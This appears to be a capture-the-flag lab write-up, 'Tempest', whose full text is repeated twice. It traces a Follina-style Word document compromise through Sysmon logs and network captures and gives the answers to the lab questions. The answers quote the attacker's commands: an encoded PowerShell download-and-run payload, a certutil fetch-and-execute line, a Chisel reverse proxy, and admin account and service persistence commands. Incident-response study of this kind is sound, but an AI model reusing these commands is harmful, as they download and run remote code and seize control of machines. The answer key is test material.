Tempest - Medium

Preparation - Log Analysis
Preparation - Tools and Artifacts
Initial Access - Malicious Document
Initial Access - Stage 2 execution
Initial Access - Malicious Document Traffic
Discovery - Internal Reconnaissance
Privilege Escalation - Exploiting Privileges
Actions on Objective - Fully-owned Machine

Preparation - Log Analysis

Log analysis - understanding events generated by system to identify anomalies (security threats, bugs, etc.) that may impact the organisation; log files and entries help in the analysis.
Event correlation - identifies significant relationships from multiple log sources.

Preparation - Tools and Artifacts

cd '.\Desktop\Incident Files\'

ls

Get-FileHash -Algorithm SHA256 .\capture.pcapng

Get-FileHash -Algorithm SHA256 .\sysmon.evtx

Get-FileHash -Algorithm SHA256 .\windows.evtx

markdown

1. What is the SHA256 hash of the capture.pcapng file? -  CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6

2. What is the SHA256 hash of the sysmon.evtx file? - 665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F

3. What is the SHA256 hash of the windows.evtx file? - D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60

Initial Access - Malicious Document

cd C:\Tools\EvtxECmd

#to parse provided logs, convert evtx to csv
.\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv 'C:\Users\user\Desktop\Incident Files' --csvf sysmon.csv
#csv saved in Incident Files folder

#we can use Timeline explorer to load exported csv

Given, the malicious document has a .doc extension, it was downloaded via chrome.exe and then used to attain code execution.
After converting .evtx to .csv using EvtxECmd tool, we can load csv into TimelineExplorer by navigating to File > Open > sysmon.csv
In order to view the 'sysmon' logs in SysmonView tool, we need to first open 'sysmon.evtx' file in Event Viewer, then save it (export) as XML file - this xml file can be opened in SysmonView now.
In TimelineExplorer, we can search for '.doc' - this gives us the name of the malicious document; the results also include the compromised user and machine under the 'User Name' column.
Scrolling through the log entries, we can see that the entries with PID 496 are associated with Microsoft Word processes.
We can narrow down these entries by using the search filter 'ProcessID: 496' as well; the IP address can be found in these entries.
Searching for 'base64' gives us the complete payload; the command to be executed can be seen in CyberChef using 'decode from base64' option.
Googling "winword.exe cve" gives us the CVE required in the first few searches itself.

markdown

1. The user of this machine was compromised by a malicious document. What is the file name of the document? - free_magicules.doc

2. What is the name of the compromised user and machine? - benimaru-TEMPEST

3. What is the PID of the Microsoft Word process that opened the malicious document? - 496

4. Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question? - 167.71.199.191

5. What is the base64 encoded string in the malicious payload executed by the document? - JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==

6. What is the CVE number of the exploit used by the attacker to achieve a remote code execution? - 2022-30190

Initial Access - Stage 2 execution

From the decoded base64 command found earlier, we can get the target path of the payload ($app refers to the AppData path).
After the log entry for the 'update.zip' command, we have to scroll down until we can see a Logon event; scrolling down a bit further we can see a malicious command being executed.
The malicious command is executed with the help of the binary payload 'first.exe'; we can search for the same term & get its SHA256 hash from the 'Payload Data3' column.
Here, we get the domain name 'resolvecyber.xyz' - viewing the entry in Payload column shows us the destination port as well.

markdown

1. The malicious execution of the payload wrote a file on the system. What is the full target path of the payload? - C:\Users\benimaru\AppData\Microsoft\Windows\Start Menu\Programs\Startup

2. The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user? - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

3. Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution? - CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8

4. The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker? - resolvecyber.xyz:80

Initial Access - Malicious Document Traffic

Now that we have the malicious domain, we can use Brim and Wireshark to find network events in the 'capture.pcapng' file.
From the Sysmon logs, we have two malicious domains - phishteam.xyz and resolvecyber.xyz; we can use both for search queries.
In Brim, we get the embedded URL by using the search query:

_path=="http" "phishteam.xyz"
We can view the webpage source code by checking the http protocol in Wireshark; we can use 'Follow http stream' option.
We can further view the packets under http protocol in Wireshark; this shows us the URL to which the c2 binary connects for command execution.

markdown

1. What is the URL of the malicious payload embedded in the document? - http://phishteam.xyz/02dcf07/index.html

2. What is the encoding used by the attacker on the c2 connection? - base64

3. The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary? - q

4. The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary? - /9ab62b5

5. What is the HTTP method used by the binary? - GET

6. Based on the user agent, what programming language was used by the attacker to compile the binary? - nim

Discovery - Internal Reconnaissance

We can use the following queries on Brim to narrow down entries:

_path=="http" "phishteam.xyz" id.resp_p==80 | cut ts, host, id.resp_p, uri | sort ts

_path=="http" "resolvecyber.xyz" id.resp_p==80 | cut ts, host, id.resp_p, uri | sort ts
The second query includes encoded strings in network traffic; decoding these strings give us the commands executed.
For further inspection, we can shift to TimelineExplorer and view the logs.
From the base64-encoded strings, we can see that the file 'ch.exe' was downloaded; so we can use that as a search query - this gives us the command used by attacker to establish reverse socks proxy.
The SHA256 hash can be searched on VirusTotal for more context.
After the 'ch.exe', we can see that the next process is 'wsmprovhost.exe' - this gives us a clue as to which tool was used.

markdown

1. The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file? - infernotempest

2. The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine? - 5985

3. The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection? - C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks

4. What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection? - 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451

5. What is the name of the tool used by the attacker based on the SHA256 hash? - Chisel

6. The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate? - winRM

Privilege Escalation - Exploiting Privileges

After the 'wsmprovhost.exe', scrolling down, we can see that the next binary downloaded was 'spf.exe'; we can confirm this by using the search term 'iwr' (Invoke-WebRequest).
To get the SHA256 hash, we can search for 'spf.exe' and the hash can be found in 'Payload Data 3' column.
We can use VirusTotal to review based on hash.

markdown

1. After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary? - spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D

2. Based on the SHA256 hash of the binary, what is the name of the tool used? - printspoofer

3. The tool exploits a specific privilege owned by the user. What is the name of the privilege? - SeImpersonatePrivilege

4. Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary? - final.exe

5. The binary connects to a different port from the first c2 connection. What is the port used? - 8080

Actions on Objective - Fully-owned Machine

In Brim, we can use the following search query:

_path=="http" "resolvecyber.xyz" id.resp_p==8080| cut ts, host, id.resp_p, uri | sort ts
Based on the results, we would have to decode the base64-strings to get the executed commands.
The command executed for persistence can be found immediately after the addition of 'shion' to local admin group with the help of TimelineExplorer

markdown

1. Upon achieving SYSTEM access, the attacker then created two users. What are the account names? - shion,shuna

2. Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail? - /add

3. Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity? - 4720

4. The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker? - net localgroup administrators /add shion

5. Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group? - 4732

6. After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this? - C:\Windows\system32\sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto

Tempest - Medium

Preparation - Log Analysis
Preparation - Tools and Artifacts
Initial Access - Malicious Document
Initial Access - Stage 2 execution
Initial Access - Malicious Document Traffic
Discovery - Internal Reconnaissance
Privilege Escalation - Exploiting Privileges
Actions on Objective - Fully-owned Machine

Preparation - Log Analysis

Log analysis - understanding events generated by system to identify anomalies (security threats, bugs, etc.) that may impact the organisation; log files and entries help in the analysis.
Event correlation - identifies significant relationships from multiple log sources.

Preparation - Tools and Artifacts

cd '.\Desktop\Incident Files\'

ls

Get-FileHash -Algorithm SHA256 .\capture.pcapng

Get-FileHash -Algorithm SHA256 .\sysmon.evtx

Get-FileHash -Algorithm SHA256 .\windows.evtx

markdown

1. What is the SHA256 hash of the capture.pcapng file? -  CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6

2. What is the SHA256 hash of the sysmon.evtx file? - 665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F

3. What is the SHA256 hash of the windows.evtx file? - D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60

Initial Access - Malicious Document

cd C:\Tools\EvtxECmd

#to parse provided logs, convert evtx to csv
.\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv 'C:\Users\user\Desktop\Incident Files' --csvf sysmon.csv
#csv saved in Incident Files folder

#we can use Timeline explorer to load exported csv

Given, the malicious document has a .doc extension, it was downloaded via chrome.exe and then used to attain code execution.
After converting .evtx to .csv using EvtxECmd tool, we can load csv into TimelineExplorer by navigating to File > Open > sysmon.csv
In order to view the 'sysmon' logs in SysmonView tool, we need to first open 'sysmon.evtx' file in Event Viewer, then save it (export) as XML file - this xml file can be opened in SysmonView now.
In TimelineExplorer, we can search for '.doc' - this gives us the name of the malicious document; the results also include the compromised user and machine under the 'User Name' column.
Scrolling through the log entries, we can see that the entries with PID 496 are associated with Microsoft Word processes.
We can narrow down these entries by using the search filter 'ProcessID: 496' as well; the IP address can be found in these entries.
Searching for 'base64' gives us the complete payload; the command to be executed can be seen in CyberChef using 'decode from base64' option.
Googling "winword.exe cve" gives us the CVE required in the first few searches itself.

markdown

1. The user of this machine was compromised by a malicious document. What is the file name of the document? - free_magicules.doc

2. What is the name of the compromised user and machine? - benimaru-TEMPEST

3. What is the PID of the Microsoft Word process that opened the malicious document? - 496

4. Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question? - 167.71.199.191

5. What is the base64 encoded string in the malicious payload executed by the document? - JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==

6. What is the CVE number of the exploit used by the attacker to achieve a remote code execution? - 2022-30190

Initial Access - Stage 2 execution

From the decoded base64 command found earlier, we can get the target path of the payload ($app refers to the AppData path).
After the log entry for the 'update.zip' command, we have to scroll down until we can see a Logon event; scrolling down a bit further we can see a malicious command being executed.
The malicious command is executed with the help of the binary payload 'first.exe'; we can search for the same term & get its SHA256 hash from the 'Payload Data3' column.
Here, we get the domain name 'resolvecyber.xyz' - viewing the entry in Payload column shows us the destination port as well.

markdown

1. The malicious execution of the payload wrote a file on the system. What is the full target path of the payload? - C:\Users\benimaru\AppData\Microsoft\Windows\Start Menu\Programs\Startup

2. The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user? - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

3. Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution? - CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8

4. The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker? - resolvecyber.xyz:80

Initial Access - Malicious Document Traffic

Now that we have the malicious domain, we can use Brim and Wireshark to find network events in the 'capture.pcapng' file.
From the Sysmon logs, we have two malicious domains - phishteam.xyz and resolvecyber.xyz; we can use both for search queries.
In Brim, we get the embedded URL by using the search query:

_path=="http" "phishteam.xyz"
We can view the webpage source code by checking the http protocol in Wireshark; we can use 'Follow http stream' option.
We can further view the packets under http protocol in Wireshark; this shows us the URL to which the c2 binary connects for command execution.

markdown

1. What is the URL of the malicious payload embedded in the document? - http://phishteam.xyz/02dcf07/index.html

2. What is the encoding used by the attacker on the c2 connection? - base64

3. The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary? - q

4. The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary? - /9ab62b5

5. What is the HTTP method used by the binary? - GET

6. Based on the user agent, what programming language was used by the attacker to compile the binary? - nim

Discovery - Internal Reconnaissance

We can use the following queries on Brim to narrow down entries:

_path=="http" "phishteam.xyz" id.resp_p==80 | cut ts, host, id.resp_p, uri | sort ts

_path=="http" "resolvecyber.xyz" id.resp_p==80 | cut ts, host, id.resp_p, uri | sort ts
The second query includes encoded strings in network traffic; decoding these strings give us the commands executed.
For further inspection, we can shift to TimelineExplorer and view the logs.
From the base64-encoded strings, we can see that the file 'ch.exe' was downloaded; so we can use that as a search query - this gives us the command used by attacker to establish reverse socks proxy.
The SHA256 hash can be searched on VirusTotal for more context.
After the 'ch.exe', we can see that the next process is 'wsmprovhost.exe' - this gives us a clue as to which tool was used.

markdown

1. The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file? - infernotempest

2. The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine? - 5985

3. The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection? - C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks

4. What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection? - 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451

5. What is the name of the tool used by the attacker based on the SHA256 hash? - Chisel

6. The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate? - winRM

Privilege Escalation - Exploiting Privileges

After the 'wsmprovhost.exe', scrolling down, we can see that the next binary downloaded was 'spf.exe'; we can confirm this by using the search term 'iwr' (Invoke-WebRequest).
To get the SHA256 hash, we can search for 'spf.exe' and the hash can be found in 'Payload Data 3' column.
We can use VirusTotal to review based on hash.

markdown

1. After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary? - spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D

2. Based on the SHA256 hash of the binary, what is the name of the tool used? - printspoofer

3. The tool exploits a specific privilege owned by the user. What is the name of the privilege? - SeImpersonatePrivilege

4. Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary? - final.exe

5. The binary connects to a different port from the first c2 connection. What is the port used? - 8080

Actions on Objective - Fully-owned Machine

In Brim, we can use the following search query:

_path=="http" "resolvecyber.xyz" id.resp_p==8080| cut ts, host, id.resp_p, uri | sort ts
Based on the results, we would have to decode the base64-strings to get the executed commands.
The command executed for persistence can be found immediately after the addition of 'shion' to local admin group with the help of TimelineExplorer

markdown

1. Upon achieving SYSTEM access, the attacker then created two users. What are the account names? - shion,shuna

2. Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail? - /add

3. Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity? - 4720

4. The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker? - net localgroup administrators /add shion

5. Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group? - 4732

6. After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this? - C:\Windows\system32\sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto